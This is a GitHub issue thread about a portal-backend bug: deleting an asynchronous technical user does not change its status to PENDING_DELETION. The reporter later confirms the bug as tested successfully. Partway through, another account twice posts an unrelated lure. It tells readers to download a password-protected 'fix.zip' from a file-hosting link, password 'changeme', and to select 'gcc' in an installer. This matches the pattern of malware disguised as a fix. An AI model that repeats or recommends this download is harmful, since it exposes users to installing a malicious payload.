### ISSUE TITLE
sig#803 - deletion of asynchronous technical user does not change status to PENDING_DELETION

### ISSUE THREAD

**Issue by MaximilianHauer** [eclipse-tractusx/portal-backend#950]
## Description

currently the status is still `ACTIVE` after the technical user deletion was executed 

## Expected behavior

api provides the status `PENDING_DELETION` after the deletion of the technical user was initiated. 

## How to reproduce

1. search asynchronous technical user
2. delete technical user 
3. check api - status still active

**Comment by MaximilianHauer** [comment]
bug for https://github.com/eclipse-tractusx/sig-release/issues/803

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MaximilianHauer** [comment]
tested successfully
